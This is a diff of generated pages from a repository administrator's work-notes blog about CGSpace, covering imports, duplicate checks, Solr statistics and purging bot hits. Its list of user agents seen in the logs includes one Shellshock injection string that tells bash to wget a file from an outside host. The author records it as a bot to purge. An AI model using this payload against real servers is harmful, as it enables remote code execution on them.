<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-02-25-tac-batch3-401to700.map
</span></span></code></pre></div><h2 id="2022-02-26">2022-02-26</h2>
<ul>
<li>Upgrade CGSpace (linode18) to Ubuntu 20.04</li>
<li>Start a full AReS harvest</li>

View File

@ -19,7 +19,7 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-03/" />
<meta property="article:published_time" content="2022-03-01T16:46:54+03:00" />
<meta property="article:modified_time" content="2022-03-01T16:46:54+03:00" />
<meta property="article:modified_time" content="2022-03-01T17:48:40+03:00" />
@ -34,7 +34,7 @@ $ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &#39;fuuu&
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -44,9 +44,9 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
"@type": "BlogPosting",
"headline": "March, 2022",
"url": "https://alanorth.github.io/cgspace-notes/2022-03/",
"wordCount": "48",
"wordCount": "349",
"datePublished": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-03-01T16:46:54+03:00",
"dateModified": "2022-03-01T17:48:40+03:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
@ -124,11 +124,67 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
<ul>
<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</code></pre></div><!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</span></span></code></pre></div><h2 id="2022-03-04">2022-03-04</h2>
<ul>
<li>Looking over the CGSpace Solr statistics from 2022-02
<ul>
<li>I see a few new bots, though once I expanded my search for user agents with &ldquo;www&rdquo; in the name I found so many more! (There is a sketch of that query at the end of this section.)</li>
<li>Here are some of the more prevalent or weird ones:
<ul>
<li>axios/0.21.1</li>
<li>Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)</li>
<li>Nutraspace/Nutch-1.2 (<a href="http://www.nutraspace.com">www.nutraspace.com</a>)</li>
<li>Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; <a href="mailto:webmaster@moreover.com">webmaster@moreover.com</a>)</li>
<li>Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com</li>
<li>Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)</li>
<li>Crowsnest/0.5 (+http://www.crowsnest.tv/)</li>
<li>Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com</li>
<li>metha/0.2.27</li>
<li>ZaloPC-win32-24v454</li>
<li>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x</li>
<li>ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)</li>
<li>FullStoryBot/1.0 (+https://www.fullstory.com)</li>
<li>Link Validity Check From: <a href="http://www.usgs.gov">http://www.usgs.gov</a></li>
<li>OSPScraper (+https://www.opensyllabusproject.org)</li>
<li>() { :;}; /bin/bash -c &quot;wget -O /tmp/bbb <a href="http://www.redel.net.br/1.php?id=3137382e37392e3138372e313832">www.redel.net.br/1.php?id=3137382e37392e3138372e313832</a>&quot;</li>
</ul>
</li>
<li>I submitted <a href="https://github.com/atmire/COUNTER-Robots/pull/52">a pull request to COUNTER-Robots</a> with some of these</li>
</ul>
</li>
<li>I purged a bunch of hits from the stats using the <code>check-spider-hits.sh</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
</span></span><span style="display:flex;"><span>Purging 6 hits from scalaj-http in statistics
</span></span><span style="display:flex;"><span>Purging 5 hits from lua-resty-http in statistics
</span></span><span style="display:flex;"><span>Purging 9 hits from AHC in statistics
</span></span><span style="display:flex;"><span>Purging 7 hits from acebookexternalhit in statistics
</span></span><span style="display:flex;"><span>Purging 1011 hits from axios\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 2216 hits from Faveeo\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 1164 hits from Moreover\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 740 hits from Exploratodo\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 585 hits from GroupHigh\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 438 hits from Crowsnest\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 1326 hits from nbertaupete95 in statistics
</span></span><span style="display:flex;"><span>Purging 182 hits from metha\/[0-9] in statistics
</span></span><span style="display:flex;"><span>Purging 68 hits from ZaloPC-win32-24v454 in statistics
</span></span><span style="display:flex;"><span>Purging 1644 hits from Firefox\/x\.x in statistics
</span></span><span style="display:flex;"><span>Purging 678 hits from ZoteroTranslationServer in statistics
</span></span><span style="display:flex;"><span>Purging 27 hits from FullStoryBot in statistics
</span></span><span style="display:flex;"><span>Purging 26 hits from Link Validity Check in statistics
</span></span><span style="display:flex;"><span>Purging 26 hits from OSPScraper in statistics
</span></span><span style="display:flex;"><span>Purging 1 hits from 3137382e37392e3138372e313832 in statistics
</span></span><span style="display:flex;"><span>Purging 2755 hits from Nutch-[0-9] in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 12914
</span></span></code></pre></div><ul>
<li>I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project</li>
</ul>
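<ul>
<li>As a rough sketch of how that expanded user agent search can be done in Solr (the <code>userAgent</code> field name and the local core URL are assumptions based on our DSpace statistics setup), a facet query surfaces every agent containing &ldquo;www&rdquo;:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?q=userAgent:*www*&amp;rows=0&amp;facet=true&amp;facet.field=userAgent&amp;facet.mincount=1&amp;wt=json&#39;
</code></pre>
<ul>
<li>Adding the local overrides is then just a matter of appending patterns to the agents file used above, for example with a few from the list I found:</li>
</ul>
<pre tabindex="0"><code>$ cat &gt;&gt; dspace/config/spiders/agents/ilri &lt;&lt;&#39;EOF&#39;
Faveeo
Exploratodo
Crowsnest
EOF
</code></pre>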
<!-- raw HTML omitted -->

View File

@ -17,7 +17,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="404 Page not found"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Categories"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -94,11 +94,11 @@
<ul>
<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2022-03/'>Read more →</a>
</article>
@ -170,13 +170,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
<li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li>
<li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
Purging 1989 hits from The Knowledge AI in statistics
Purging 1235 hits from MaCoCu in statistics
Purging 455 hits from WhatsApp in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics
</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics
</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</span></span></code></pre></div>
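<ul>
<li>For reference, a sketch of how the <code>/tmp/agents</code> list can be regenerated from upstream, assuming the <code>pattern</code> key used in the COUNTER-Robots JSON list:</li>
</ul>
<pre tabindex="0"><code>$ wget -q https://raw.githubusercontent.com/atmire/COUNTER-Robots/master/COUNTER_Robots_list.json
$ jq -r &#39;.[].pattern&#39; COUNTER_Robots_list.json &gt; /tmp/agents
</code></pre>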
<a href='https://alanorth.github.io/cgspace-notes/2021-12/'>Read more →</a>
</article>
@ -199,9 +199,9 @@ Purging 455 hits from WhatsApp in statistics
<li>I experimented with manually sharding the Solr statistics on DSpace Test</li>
<li>First I exported all the 2019 stats from CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json
</span></span></code></pre></div>
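<ul>
<li>The import half of that experiment would be something like this sketch, assuming Solr&rsquo;s CoreAdmin API and the import and delete actions of the same <code>run.sh</code> tool (the core name and data directory here are illustrative):</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/admin/cores?action=CREATE&amp;name=statistics-2019&amp;instanceDir=statistics&amp;dataDir=statistics-2019/data&#39;
$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics-2019.json -k uid
$ ./run.sh -s http://localhost:8081/solr/statistics -a delete -f &#39;time:2019-*&#39;
</code></pre>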
<a href='https://alanorth.github.io/cgspace-notes/2021-11/'>Read more →</a>
</article>
@ -223,15 +223,15 @@ $ zstd statistics-2019.json
<ul>
<li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affiliations-matching.csv
$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
1879
$ wc -l /tmp/2021-10-01-affiliations.txt
7100 /tmp/2021-10-01-affiliations.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
</span></span><span style="display:flex;"><span>ations-matching.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
</span></span><span style="display:flex;"><span>1879
</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt
</span></span></code></pre></div><ul>
<li>So we have 1879/7100 (26.46%) matching already</li>
</ul>
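<ul>
<li>A quick approximation of the exact-name part of that lookup is possible with jq alone; this only checks primary names, not aliases or labels, so it undercounts:</li>
</ul>
<pre tabindex="0"><code>$ jq -r &#39;.[].name&#39; 2021-09-23-ror-data.json | tr &#39;[:upper:]&#39; &#39;[:lower:]&#39; | sort -u &gt; /tmp/ror-names.txt
$ tr &#39;[:upper:]&#39; &#39;[:lower:]&#39; &lt; /tmp/2021-10-01-affiliations.txt | sort -u | comm -12 - /tmp/ror-names.txt | wc -l
</code></pre>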
<a href='https://alanorth.github.io/cgspace-notes/2021-10/'>Read more →</a>
@ -288,8 +288,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
<ul>
<li>Update Docker images on AReS server (linode20) and reboot the server:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</span></span></code></pre></div><ul>
<li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li>
</ul>
<a href='https://alanorth.github.io/cgspace-notes/2021-08/'>Read more →</a>
@ -313,9 +313,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
<ul>
<li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
COPY 20994
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 20994
</span></span></code></pre></div>
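<ul>
<li>To share just the subject strings without the counts, the same csvkit idiom used elsewhere in these notes applies:</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c subject /tmp/2021-07-01-all-subjects.csv | sed 1d &gt; /tmp/2021-07-01-all-subjects.txt
$ wc -l /tmp/2021-07-01-all-subjects.txt
20994 /tmp/2021-07-01-all-subjects.txt
</code></pre>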
<a href='https://alanorth.github.io/cgspace-notes/2021-07/'>Read more →</a>
</article>

View File

@ -17,11 +17,11 @@
&lt;ul&gt;
&lt;li&gt;Send Gaia the last batch of potential duplicates for items 701 to 980:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;fuuu&amp;#39;&lt;/span&gt; -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &amp;gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;fuuu&amp;#39;&lt;/span&gt; -o /tmp/2022-03-01-tac-batch4-701-980.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4-filenames.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &amp;gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -66,13 +66,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
&lt;li&gt;Atmire merged some changes I had submitted to the COUNTER-Robots project&lt;/li&gt;
&lt;li&gt;I updated our local spider user agents and then re-ran the list with my &lt;code&gt;check-spider-hits.sh&lt;/code&gt; script on CGSpace:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
Purging 1989 hits from The Knowledge AI in statistics
Purging 1235 hits from MaCoCu in statistics
Purging 455 hits from WhatsApp in statistics
&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
&lt;/span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;&lt;/span&gt;Total number of bot hits purged: 3679
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 1989 hits from The Knowledge AI in statistics
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 1235 hits from MaCoCu in statistics
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 455 hits from WhatsApp in statistics
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;&lt;/span&gt;Total number of bot hits purged: 3679
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -86,9 +86,9 @@ Purging 455 hits from WhatsApp in statistics
&lt;li&gt;I experimented with manually sharding the Solr statistics on DSpace Test&lt;/li&gt;
&lt;li&gt;First I exported all the 2019 stats from CGSpace:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ ./run.sh -s http://localhost:8081/solr/statistics -f &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;time:2019-*&amp;#39;&lt;/span&gt; -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./run.sh -s http://localhost:8081/solr/statistics -f &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;time:2019-*&amp;#39;&lt;/span&gt; -a export -o statistics-2019.json -k uid
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ zstd statistics-2019.json
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -101,15 +101,15 @@ $ zstd statistics-2019.json
&lt;ul&gt;
&lt;li&gt;Export all affiliations on CGSpace and run them against the latest RoR data dump:&lt;/li&gt;
&lt;/ul&gt;
